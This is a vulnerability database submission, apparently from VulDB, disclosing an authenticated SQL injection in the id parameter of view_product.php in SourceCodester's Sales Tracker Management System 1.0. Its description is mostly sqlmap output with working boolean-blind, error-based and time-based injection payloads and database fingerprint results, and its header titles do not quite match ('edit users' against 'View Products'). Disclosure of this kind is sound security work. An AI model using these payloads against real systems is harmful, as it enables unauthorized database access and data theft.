| Title | Authenticated SQL Injection on Sales Tracker System When View Products |
|---|
| Description | # Exploit Title: Authenticated SQL Injection on Sales Tracker System When edit users
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# Tested on: Windows 11
# Check Detailed write-up : http://ahmedismailozil.blogspot.com/
```
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://localhost:80/php-sts/admin/products/view_product.php?id=5' AND 3751=3751-- vKjv
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://localhost:80/php-sts/admin/products/view_product.php?id=5' OR (SELECT 4094 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(4094=4094,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- iMtv
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://localhost:80/php-sts/admin/products/view_product.php?id=5' AND (SELECT 1697 FROM (SELECT(SLEEP(5)))HGvM)-- EEHf
---
[09:57:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
``` |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html |
|---|
| User | mroz1l (UID 41497) |
|---|
| Submission | 02/23/2023 07:25 (3 years ago) |
|---|
| Moderation | 02/23/2023 16:14 (9 hours later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 221634 [SourceCodester Sales Tracker Management System 1.0 view_product.php ID sql injection] |
|---|
| Points | 0 |
|---|